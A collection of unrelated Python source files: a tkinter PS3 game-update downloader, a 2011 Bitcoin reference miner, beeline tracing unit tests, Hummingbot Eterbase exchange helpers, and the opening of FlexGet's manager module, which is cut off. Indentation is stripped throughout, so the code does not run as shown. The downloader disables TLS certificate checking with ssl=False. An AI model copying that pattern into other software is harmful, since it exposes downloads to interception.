file_name = url.split('/')[-1]
file_path = f"{save_path}/{file_name}"
# Create a tkinter Toplevel window and give it a (kind of) descriptive title.
downloading_window = tk.Toplevel()
downloading_window.title("Downloader")
# Create a tkinter Label, place it in downloading_window, and set the Label's text to inform the user that it's downloading the specified file.
downloading_label = tk.Label(downloading_window, text=f"Downloading {file_name}...")
downloading_label.pack()
# Create a tkinter Progressbar, place it in downloading_window, and set the bar to be 100% full when the bar's amount is equal to the size of the specified file in bytes.
downloading_progress_bar = ttk.Progressbar(downloading_window, mode="determinate", length=300, maximum=size)
downloading_progress_bar.pack()
# N.B.: The aiohttp documentation discourages creating multiple ClientSessions in one project, preferring that users reuse a single session throughout.
# I don't do that here, and I personally haven't had any issues, but it's technically not best practice for this library, so keep that in mind if you use this as an aiohttp example.
# Granted, you probably shouldn't be using this dumpster fire as an example of anything other than bad code.
# Open an aiohttp ClientSession as session and:
async with aiohttp.ClientSession() as session:
# Get the contents of the given URL as resp and:
async with session.get(url) as resp:
# Create the file at file_path if it doesn't exist and open it as writeable binary with the name file and:
with open(file_path, 'wb') as file:
# While chunk is assigned to a truthy value:
while (chunk := await resp.content.read(ONE_MEBIBYTE)):
# Write the current chunk to file.
file.write(chunk)
# Increment the progress bar by the length of the current chunk (usually 1MiB unless near the end of file)
downloading_progress_bar.step(amount=len(chunk))
# Change the text of the tkinter Button and set its state to disabled
button.configure(text="Downloaded!", state=tk.DISABLED)
# Destroy the downloading window.
downloading_window.destroy()
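# For reference, the core streaming pattern above boils down to the following
# (a sketch with the same names as above, minus the GUI plumbing; not a
# drop-in replacement):
#
#   async with aiohttp.ClientSession() as session:
#       async with session.get(url) as resp:
#           with open(file_path, 'wb') as file:
#               while (chunk := await resp.content.read(ONE_MEBIBYTE)):
#                   file.write(chunk)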
# load_game_info is an async function that takes in no arguments. It then retrieves any available updates for the titles specified in the "games.yml" file and shows the user a list of all available updates along with the option to download said updates.
async def load_game_info():
# Tkinter doesn't have an easy way to make a scrollable frame and I didn't want to add another dependency for something so trivial.
# After a bit of googling, I found an article by Jose Salvatierra (https://blog.tecladocode.com/tkinter-scrollable-frames/) that accomplishes exactly what I need.
# Create a Tkinter frame that will act as a container for our canvas and scrollbar (hence the name 'container')
container = tk.Frame(main_frame)
# Create a Tkinter canvas that will contain the frame we want to be scrollable. While Tkinter frames cannot be scrollable, Tkinter canvases can.
canvas = tk.Canvas(container)
# Create a Tkinter scrollbar to scroll our canvas.
scrollbar = tk.Scrollbar(container, command=canvas.yview)
# Finally, create the Tkinter frame we want to be scrollable.
header = tk.Frame(canvas)
# Open an aiohttp ClientSession as session and:
async with aiohttp.ClientSession() as session:
# For each game in the games.yml file:
for game in game_ids:
# We need to specify no SSL because the PS3 update server uses a self-signed certificate.
# I'm sure an actual PS3 has no issue with that, but aiohttp (and any remotely modern web browser) definitely does.
# Get the contents of the specified URL as response and:
async with session.get(f"https://a0.ww.np.dl.playstation.net/tpl/np/{game}/{game}-ver.xml", ssl=False) as response:
# Check the text of the response.
# This is important because a game with no updates will sometimes return a 200 code with zero text, while other games with no updates return a 404 error code.
content = await response.text()
# Inform the user no content was found for the specified game if the page 404s or has no content.
if response.status == 404 or content == "":
print(f"Nothing found for {game}!")
else:
# Convert the XML into a manipulable data structure using ElementTree
base = ElementTree.fromstring(content)
# Set updates to the list of updates
updates = base[0]
# Set updates_list to an empty list
updates_list = []
# For each update:
for update in updates:
# Add the current game to updates_list
updates_list.append(update.attrib)
try:
# Set the title of the game. This will only work for the last listed update for a given title. All other updates for a given title will throw an IndexError because the TITLE attribute will not exist.
title = update[0][0].text
# Inform the user a new title was found.
print(f"New title: {title}")
# Add the title to updates_dict
updates_dict[title] = updates_list
except IndexError:
# Inform the user that an IndexError was thrown and why it was thrown.
print("IndexError thrown! No TITLE tag found, ignoring...")
# Set updates_list back to an empty list
# There is likely a much neater way to do this, but I'm bad at coding.
updates_list = []
# For a given title and its updates in updates_dict:
for (title, updates) in updates_dict.items():
# Create a Tkinter LabelFrame, set its parent to header, and set its title to the title of the current game.
current_game = tk.LabelFrame(header, text=title)
current_game.pack()
# For each update for a given game:
for update in updates:
# Create a Tkinter Label and set its text to show the version of the update file.
game_version = tk.Label(current_game, text=f"Version: {update['version']}")
game_version.pack()
# Create a Tkinter Label and set its text to show the size of the update file in MiB rounded to 1 decimal place.
game_size = tk.Label(current_game, text=f"Update Size: {round(int(update['size']) / ONE_MEBIBYTE, 1)} MiB")
game_size.pack()
# Create a Tkinter Label and set its text to show the SHA1 Checksum of the update file.
game_sha1_sum = tk.Label(current_game, text=f"SHA1 Checksum: {update['sha1sum']}")
game_sha1_sum.pack()
# Create a Tkinter Label and set its text to show the PS3 firmware version required by the update.
game_system_version = tk.Label(current_game, text="Required Firmware: Version %.2f" % float(update['ps3_system_ver']))
game_system_version.pack()
# Create a Tkinter Button that will download the update to the previously specified save path on click.
game_download = tk.Button(current_game, text="Download Update")
# Set the Button's command to download the specified game update using the async_download_handler function.
# The reason this looks like such a mess is because:
# 1. I am bad at coding.
# 2. Since Tkinter doesn't neatly support multi-threaded tasks, the download bar would not show any progress unless I specifically create a new asyncio Event Loop to run the download task asynchronously.
game_download.config(command=lambda url=update['url'], button=game_download, size=int(update['size']): async_op(async_download_handler, [url, save_path, size, button]))
game_download.pack()
# Make the loading bar and label invisible since they are no longer needed.
loading_bar.pack_forget()
loading_label.pack_forget()
# Change the size of canvas whenever header changes size (i.e. whenever we add a widget).
header.bind("<Configure>", lambda e: canvas.configure(scrollregion=canvas.bbox("all")))
# Draw header starting at the top-left corner of canvas.
canvas.create_window((0, 0), window=header, anchor=tk.NW)
# Allow the scrollbar to actually scroll the canvas.
canvas.configure(yscrollcommand=scrollbar.set)
# Allow the user to scroll the list using their mouse's scroll wheel.
canvas.bind_all("<MouseWheel>", lambda e: canvas.yview_scroll(int(-e.delta/120), "units"))
canvas.bind("<Configure>", lambda e: canvas.scale("all", 0, 0, e.width, e.height))
# Set the container, canvas, and scrollbar to be visible.
container.pack(fill=tk.BOTH, expand=True)
canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
# Initialize tkinter and set the window title.
root = tk.Tk()
root.title("PS3 Game Update Downloader")
# Create a Tkinter Frame to act as our primary frame for all widgets.
main_frame = tk.Frame(root)
main_frame.pack(fill=tk.BOTH, expand=True)
# Create a Tkinter Label to fill space while the program is retrieving updates.
loading_label = tk.Label(main_frame, text="Loading...")
loading_label.pack()
# Create an indeterminate Tkinter Progressbar to show the user that the program is retrieving updates and not frozen.
loading_bar = ttk.Progressbar(main_frame, mode="indeterminate", length=300)
loading_bar.start()
loading_bar.pack()
# Prompt the user to find their RPCS3 'games.yml' file.
file_path = filedialog.askopenfilename(title="Open Your RPCS3 'games.yml' File", filetypes=(("RPCS3 'games.yml' File", "games.yml"),))
# Prompt the user to select a folder to save their PS3 game updates in.
save_path = filedialog.askdirectory(title="Select a folder to save updates in")
# Load 'games.yml' at the specified path using PyYAML's safe_load function.
games = yaml.safe_load(open(file_path))
# Set game_ids to a list of the game IDs present in 'games.yml'
game_ids = list(games.keys())
# Set updates_dict to an empty dictionary
updates_dict = {}
# Asynchronously retrieve the PS3 game updates.
# As before, we need to do this because Tkinter likes to do things synchronously, which causes our loading bar to freeze.
async_op(async_query_handler)
root.mainloop()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
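# Copying this partially-updated hash object below gives each nonce attempt a
# cached "midstate", so only the final 4 nonce bytes are hashed per iteration
# instead of the full 80-byte header.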
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 46333
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_beeline.py
|
import threading
import unittest
from mock import Mock, patch, call
import beeline
import libhoney
assert libhoney
class TestBeeline(unittest.TestCase):
def setUp(self):
self.addCleanup(patch.stopall)
self.m_gbl = patch('beeline._GBL').start()
def test_send_event(self):
''' test correct behavior for send_event '''
_beeline = beeline.Beeline()
_beeline.tracer_impl = Mock()
m_span = Mock()
_beeline.tracer_impl.get_active_span.return_value = m_span
_beeline.send_event()
_beeline.tracer_impl.get_active_span.assert_called_once_with()
_beeline.tracer_impl.finish_trace.assert_called_once_with(m_span)
def test_send_no_events(self):
''' ensure nothing crashes when we try to send with no events in the
stack '''
_beeline = beeline.Beeline()
_beeline.tracer_impl = Mock()
_beeline.tracer_impl.get_active_span.return_value = None
_beeline.send_event()
_beeline.tracer_impl.get_active_span.assert_called_once_with()
def test_send_all(self):
''' ensure events are flushed, and that the root span is handled with
finish_trace '''
s1, s2, s3 = Mock(), Mock(), Mock()
s1.is_root.return_value = False
s2.is_root.return_value = False
s3.is_root.return_value = True
_beeline = beeline.Beeline()
_beeline.tracer_impl = Mock()
_beeline.tracer_impl.get_active_span.side_effect = [s1, s2, s3, None]
_beeline.send_all()
_beeline.tracer_impl.finish_span.assert_has_calls([
call(s1),
call(s2),
])
_beeline.tracer_impl.finish_trace.assert_called_once_with(s3)
def test_run_hooks_and_send_no_hooks(self):
''' ensure send works when no hooks defined '''
ev = Mock()
_beeline = beeline.Beeline()
_beeline.tracer_impl = Mock()
_beeline._run_hooks_and_send(ev)
# no hooks, not a traced event - call send
ev.send.assert_called_once_with()
ev.send_presampled.assert_not_called()
def test_run_hooks_and_send_sampler(self):
''' ensure send works with a sampler hook defined '''
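# As exercised below, a sampler hook returns a (keep_event, sample_rate)
# tuple; returning False in the first position drops the event entirely.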
def _sampler_drop_all(fields):
return False, 0
m_sampler_hook = Mock()
m_sampler_hook.side_effect = _sampler_drop_all
_beeline = beeline.Beeline(sampler_hook=m_sampler_hook)
_beeline.tracer_impl = Mock()
ev = Mock()
_beeline._run_hooks_and_send(ev)
m_sampler_hook.assert_called_once_with(ev.fields())
ev.send_presampled.assert_not_called()
ev.send.assert_not_called()
def _sampler_drop_none(fields):
return True, 100
ev = Mock()
m_sampler_hook.reset_mock()
m_sampler_hook.side_effect = _sampler_drop_none
_beeline._run_hooks_and_send(ev)
m_sampler_hook.assert_called_once_with(ev.fields())
self.assertEqual(ev.sample_rate, 100)
ev.send_presampled.assert_called_once_with()
ev.send.assert_not_called()
def test_run_hooks_and_send_presend_hook(self):
''' ensure send works when presend hook is defined '''
def _presend_hook(fields):
fields["thing i want"] = "put it there"
del fields["thing i don't want"]
m_presend_hook = Mock()
m_presend_hook.side_effect = _presend_hook
_beeline = beeline.Beeline(presend_hook=m_presend_hook)
_beeline.tracer_impl = Mock()
ev = Mock()
ev.fields.return_value = {
"thing i don't want": "get it out of here",
"happy data": "so happy",
}
_beeline._run_hooks_and_send(ev)
ev.send_presampled.assert_not_called()
ev.send.assert_called_once_with()
self.assertDictEqual(
ev.fields(),
{
"thing i want": "put it there",
"happy data": "so happy",
},
)
def test_start_trace_returns_value(self):
''' ensure the top-level start_span and start_trace APIs return the value
from their calls to the tracer '''
self.m_gbl.tracer_impl.start_span.return_value = 'wooimaspan'
val = beeline.start_span()
self.assertEqual(val, 'wooimaspan')
self.m_gbl.tracer_impl.start_trace.return_value = 'wooimatrace'
val = beeline.start_trace()
self.assertEqual(val, 'wooimatrace')
def test_marshal_trace_context_returns_value(self):
''' ensure the top-level definition of marshal_trace_context returns a value '''
self.m_gbl.tracer_impl.marshal_trace_context.return_value = 'asdf'
val = beeline.marshal_trace_context()
self.assertEqual(val, 'asdf')
def test_trace_wrapper(self):
''' ensure that the trace wrapper decorates a function and starts a trace '''
_beeline = beeline.Beeline()
with patch('beeline.get_beeline') as m_gbl:
m_gbl.return_value = _beeline
_beeline.tracer_impl._run_hooks_and_send = Mock()
@beeline.traced(name="my_sum")
def my_sum(a, b):
return a + b
# this should accept the function's arguments normally and return the function's value
# if there is one
self.assertEqual(my_sum(1, 2), 3)
# check that an event was sent, from which we can infer that the function was wrapped
self.assertTrue(_beeline.tracer_impl._run_hooks_and_send.called)
def test_threaded_trace(self):
_beeline = beeline.Beeline()
with patch('beeline.get_beeline') as m_gbl:
m_gbl.return_value = _beeline
_beeline.tracer_impl._run_hooks_and_send = Mock()
_beeline.tracer_impl.start_trace(trace_id="asdf")
self.assertEqual(_beeline.tracer_impl._state.trace_id, "asdf")
def thread_func():
# confirm no trace state in new thread
self.assertFalse(hasattr(_beeline.tracer_impl._state, 'trace_id'))
t = threading.Thread(target=thread_func)
t.start()
t.join()
@beeline.traced_thread
def traced_thread_func():
self.assertEqual(_beeline.tracer_impl._state.trace_id, "asdf")
with _beeline.tracer(name="foo") as span:
self.assertEqual(span.trace_id, "asdf")
self.assertEqual(span.parent_id, _beeline.tracer_impl._state.stack[0].id)
t = threading.Thread(target=traced_thread_func)
t.start()
t.join()
# test use of beeline client
@_beeline.traced_thread
def traced_thread_func_2():
self.assertEqual(_beeline.tracer_impl._state.trace_id, "asdf")
with _beeline.tracer(name="foo2") as span:
self.assertEqual(span.trace_id, "asdf")
self.assertEqual(span.parent_id, _beeline.tracer_impl._state.stack[0].id)
t = threading.Thread(target=traced_thread_func_2)
t.start()
t.join()
def test_finish_span_none(self):
''' ensure finish_span does not crash if an empty span is passed to it '''
_beeline = beeline.Beeline()
# should not crash
_beeline.tracer_impl.finish_span(None)
class TestBeelineNotInitialized(unittest.TestCase):
def setUp(self):
self.addCleanup(patch.stopall)
self.m_gbl = patch('beeline.get_beeline').start()
self.m_gbl.return_value = None
def test_trace_wrapper(self):
''' ensure the trace wrapper doesn't break if the beeline is not initialized '''
self.assertIsNone(beeline.get_beeline())
@beeline.traced(name="my_sum")
def my_sum(a, b):
return a + b
# this should not crash if the beeline isn't initialized
# it should also accept arguments normally and return the function's value
self.assertEqual(my_sum(1, 2), 3)
def test_tracer_context_manager(self):
''' ensure the tracer context manager doesn't break if the beeline is not initialized '''
self.assertIsNone(beeline.get_beeline())
def my_sum(a, b):
with beeline.tracer(name="my_sum"):
return a + b
# this should not crash if the beeline isn't initialized
# it should also accept arguments normally and return the function's value
self.assertEqual(my_sum(1, 2), 3)
def test_traced_thread(self):
self.assertIsNone(beeline.get_beeline())
@beeline.traced_thread
def my_sum(a, b):
return a + b
# this should not crash if the beeline isn't initialized
# it should also accept arguments normally and return the function's value
self.assertEqual(my_sum(1, 2), 3)
|
eterbase_utils.py
|
import logging
from typing import Dict, Any, Optional, Tuple, List
import hummingbot.connector.exchange.eterbase.eterbase_constants as constants
from hummingbot.connector.exchange.eterbase.eterbase_auth import EterbaseAuth
import aiohttp
import asyncio
import json
from threading import Thread
_eu_logger = logging.getLogger(__name__)
shared_client = None
marketid_map = None
API_CALL_TIMEOUT = 10.0
async def _http_client(loop: Optional[asyncio.AbstractEventLoop] = None) -> aiohttp.ClientSession:
"""
:returns: Shared client session instance
"""
# calling the API from a different thread
if loop is not None:
return aiohttp.ClientSession(loop=loop)
# calling the API from the main thread
global shared_client
if shared_client is None:
shared_client = aiohttp.ClientSession()
return shared_client
async def api_request(http_method: str,
path_url: str = None,
url: str = None,
data: Optional[Dict[str, Any]] = None,
auth: Optional[EterbaseAuth] = None,
loop: Optional[asyncio.AbstractEventLoop] = None) -> Dict[str, Any]:
"""
A wrapper for submitting API requests to Eterbase
:returns: json data from the endpoints
"""
assert path_url is not None or url is not None
url = f"{constants.REST_URL}{path_url}" if url is None else url
data_str = None
if data is not None:
data_str = json.dumps(data)
_eu_logger.debug(f"Request: url: {url}")
_eu_logger.debug(f"Request: data: {data_str}")
headers = {}
if auth is not None:
headers = auth.get_headers(http_method, url, data_str)
if data is not None:
headers['Content-Type'] = "application/json"
client = await _http_client(loop)
async with client.request(http_method,
url=url,
timeout=API_CALL_TIMEOUT,
data=data_str,
headers=headers) as response:
data = await response.text()
_eu_logger.debug(f"Response text data: '{data}'."[:400])
if len(data) > 0:
try:
data = json.loads(data)
except ValueError:
_eu_logger.info(f"Response is not a json text: '{data}'."[:400])
if (response.status != 200) and (response.status != 204):
raise IOError(f"Error fetching data from {url}. HTTP status is {response.status}. {data}", response.status)
return data
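# Minimal usage sketch (the "/markets" endpoint is taken from the calls further
# down in this module; must be awaited inside a running event loop):
#
#   markets = await api_request("get", path_url="/markets")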
def start_background_loop(loop: asyncio.AbstractEventLoop) -> None:
loop.run_forever()
def get_marketid_mapping() -> Dict[int, str]:
global marketid_map
if (marketid_map is None):
loop = asyncio.new_event_loop()
t = Thread(target=start_background_loop, args=(loop, ), daemon=True)
t.start()
future = asyncio.run_coroutine_threadsafe(api_request("get", path_url="/markets", loop=loop), loop)
markets = future.result(constants.API_TIMEOUT_SEC)
loop.stop()
marketid_map = dict()
for market in markets:
marketid = market.get("id")
if marketid not in marketid_map:
trad_pair = market.get("symbol")
marketid_map[marketid] = trad_pair
return marketid_map
trading_pairs_split = None
def prepare_trading_pairs_split(markets: List):
global trading_pairs_split
if trading_pairs_split is None:
trading_pairs_split = dict()
for market in markets:
trad_pair = market.get("symbol")
if trad_pair not in trading_pairs_split:
base = market.get("base")
quote = market.get("quote")
trading_pairs_split[trad_pair] = {"base": base, "quote": quote}
def split_trading_pair(trading_pair: str) -> Tuple[str, str]:
global trading_pairs_split
if (trading_pairs_split is None):
loop = asyncio.new_event_loop()
t = Thread(target=start_background_loop, args=(loop, ), daemon=True)
t.start()
future = asyncio.run_coroutine_threadsafe(api_request("get", path_url="/markets", loop=loop), loop)
markets = future.result(constants.API_TIMEOUT_SEC)
loop.stop()
prepare_trading_pairs_split(markets)
try:
market = trading_pairs_split[trading_pair]
base_asset = market['base']
quote_asset = market['quote']
return base_asset, quote_asset
except Exception:
raise ValueError(f"Error parsing trading_pair {trading_pair}", exc_info=True)
def convert_to_exchange_trading_pair(hb_trading_pair: str) -> str:
return hb_trading_pair.replace("-", "")
def convert_from_exchange_trading_pair(trading_pair: str) -> str:
base, quote = split_trading_pair(trading_pair)
return f"{base}-{quote}"
|
manager.py
|
import argparse # noqa
import atexit # noqa
import codecs # noqa
import copy # noqa
import errno # noqa
import fnmatch # noqa
import hashlib # noqa
import io # noqa
import os # noqa
import shutil # noqa
import signal # noqa
import sys # noqa
import threading # noqa
import traceback # noqa
from contextlib import contextmanager # noqa
from datetime import datetime, timedelta # noqa
from typing import Iterator, List, Optional, Sequence, Tuple, Type, Union # noqa
import sqlalchemy # noqa
import yaml # noqa
from loguru import logger # noqa
from sqlalchemy.exc import OperationalError # noqa
from sqlalchemy.ext.declarative import declarative_base # noqa
from sqlalchemy.orm import sessionmaker # noqa
# These need to be declared before we start importing from other flexget modules, since they might import them
from flexget.utils.sqlalchemy_utils import ContextSession # noqa
from flexget.utils.tools import get_current_flexget_version, io_encoding, pid_exists # noqa
Base = declarative_base()
Session: Type[ContextSession] = sessionmaker(class_=ContextSession)
import flexget.log # noqa
from flexget import config_schema, db_schema, plugin # noqa
from flexget.event import fire_event # noqa
from flexget.ipc import IPCClient, IPCServer # noqa
from flexget.options import ( # noqa
CoreArgumentParser,
ParserError,
get_parser,
manager_parser,
unicode_argv,
)
from flexget.task import Task # noqa
from flexget.task_queue import TaskQueue # noqa
from flexget.terminal import console, get_console_output # noqa
logger = logger.bind(name='manager')
manager = None
DB_CLEANUP_INTERVAL = timedelta(days=7)
class Manager:
"""Manager class for FlexGet
Fires events:
* manager.initialize
The first time the manager is initialized, before config is loaded
* manager.before_config_load
Before the config file is loaded from disk
* manager.before_config_validate
When updating the config, before the validator is run on it
* manager.config_updated
After a configuration file has been loaded or changed (and validated) this event is fired
* manager.startup
After the manager has been initialized. This is when the application becomes ready to use;
however, no database lock is present, so the database must not be modified on this event.
* manager.lock_acquired
The manager does not always require a lock on startup, if one is requested,
this event will run when it has been acquired successfully
* manager.upgrade
If any plugins have declared a newer schema version than exists in the database,
this event will be fired to allow plugins to upgrade their tables
* manager.shutdown_requested
When shutdown has been requested. Any plugins which might add to
execution queue should stop when this is fired.
* manager.shutdown
When the manager is exiting
* manager.execute.completed
If execution in current process was completed
* manager.daemon.started
* manager.daemon.completed
* manager.db_cleanup
"""
unit_test = False
options = None
def __init__(self, args: Optional[Sequence]) -> None:
"""
:param args: CLI args
"""
global manager
if not self.unit_test:
assert not manager, 'Only one instance of Manager should be created at a time!'
elif manager:
logger.info('last manager was not torn down correctly')
if args is None:
# Decode all arguments to unicode before parsing
args = unicode_argv()[1:]
self.args = args
self.autoreload_config = False
self.config_file_hash = None
self.config_base = None
self.config_name = None
self.config_path = None
self.log_filename = None
self.db_filename = None
self.engine = None
self.lockfile = None
self.database_uri = None
self.db_upgraded = False
self._has_lock = False
self.is_daemon = False
self.ipc_server = None
self.task_queue = None
self.persist = None
self.initialized = False
self.config = {}
self.options = self._init_options(args)
try:
self._init_config(create=False)
except:
flexget.log.start(level=self.options.loglevel, to_file=False)
raise
manager = self
logger.debug('sys.defaultencoding: {}', sys.getdefaultencoding())
logger.debug('sys.getfilesystemencoding: {}', sys.getfilesystemencoding())
logger.debug('flexget detected io encoding: {}', io_encoding)
logger.debug('os.path.supports_unicode_filenames: {}', os.path.supports_unicode_filenames)
if (
codecs.lookup(sys.getfilesystemencoding()).name == 'ascii'
and not os.path.supports_unicode_filenames
):
logger.warning(
'Your locale declares ascii as the filesystem encoding. Any plugins reading filenames from '
'disk will not work properly for filenames containing non-ascii characters. Make sure your '
'locale env variables are set up correctly for the environment which is launching FlexGet.'
)
def _add_tray_icon_items(self, tray_icon: 'TrayIcon'):
tray_icon.add_menu_item(text='Shutdown', action=self.shutdown, index=2)
tray_icon.add_menu_item(text='Reload Config', action=self.load_config, index=3)
tray_icon.add_menu_separator(index=4)
@staticmethod
def _init_options(args: Sequence[str]) -> argparse.Namespace:
"""
Initialize argument parsing
"""
try:
options = CoreArgumentParser().parse_known_args(args, do_help=False)[0]
except ParserError as exc:
try:
# If a non-built-in command was used, we need to parse with a parser that
# doesn't define the subparsers
options = manager_parser.parse_known_args(args, do_help=False)[0]
except ParserError:
manager_parser.print_help()
print(f'\nError: {exc.message}')
sys.exit(1)
return options
def _init_logging(self, to_file: bool = True) -> None:
"""
Initialize logging facilities
"""
log_file = os.path.expanduser(self.options.logfile)
# If an absolute path is not specified, use the config directory.
if not os.path.isabs(log_file):
log_file = os.path.join(self.config_base, log_file)
self.log_filename = log_file
flexget.log.start(
log_file, self.options.loglevel, to_file=to_file, to_console=not self.options.cron
)
def initialize(self) -> None:
"""
Load plugins, database, and config. Also initializes (but does not start) the task queue and ipc server.
This should only be called after obtaining a lock.
"""
if self.initialized:
raise RuntimeError('Cannot call initialize on an already initialized manager.')
plugin.load_plugins(
extra_plugins=[os.path.join(self.config_base, 'plugins')],
extra_components=[os.path.join(self.config_base, 'components')],
)
# Reparse CLI options now that plugins are loaded
self.options = get_parser().parse_args(self.args)
self.task_queue = TaskQueue()
self.ipc_server = IPCServer(self, self.options.ipc_port)
self.setup_yaml()
self.init_sqlalchemy()
fire_event('manager.initialize', self)
try:
self.load_config()
except ValueError as e:
logger.critical('Failed to load config file: {}', e.args[0])
raise
# cannot be imported at module level because of circular references
from flexget.utils.simple_persistence import SimplePersistence
self.persist = SimplePersistence('manager')
if db_schema.upgrade_required():
logger.info('Database upgrade is required. Attempting now.')
fire_event('manager.upgrade', self)
if manager.db_upgraded:
fire_event('manager.db_upgraded', self)
fire_event('manager.startup', self)
self.initialized = True
@property
def tasks(self) -> List[str]:
"""A list of tasks in the config"""
if not self.config:
return []
return list(self.config.get('tasks', {}).keys())
@property
def has_lock(self) -> bool:
return self._has_lock
def execute(
self,
options: Optional[Union[dict, argparse.Namespace]] = None,
priority: int = 1,
suppress_warnings: Optional[Sequence[str]] = None,
) -> List[Tuple[str, str, threading.Event]]:
"""
Run all (can be limited with options) tasks from the config.
:param options: Either an :class:`argparse.Namespace` instance, or a dict, containing options for execution
:param priority: If there are other executions waiting to be run, they will be run in priority order,
lowest first.
:param suppress_warnings: Allows suppressing log warning about missing plugin in key phases
:returns: a list of ``(task_id, task_name, threading.Event)`` tuples; each
event will be set when the respective task has finished running
"""
if options is None:
options = copy.copy(self.options.execute)
elif isinstance(options, dict):
options_namespace = copy.copy(self.options.execute)
options_namespace.__dict__.update(options)
options = options_namespace
task_names = self.tasks
# Only reload config if daemon
config_hash = self.hash_config()
if self.is_daemon and self.autoreload_config and self.config_file_hash != config_hash:
logger.info('Config change detected. Reloading.')
try:
self.load_config(output_to_console=False, config_file_hash=config_hash)
logger.info('Config successfully reloaded!')
except Exception as e:
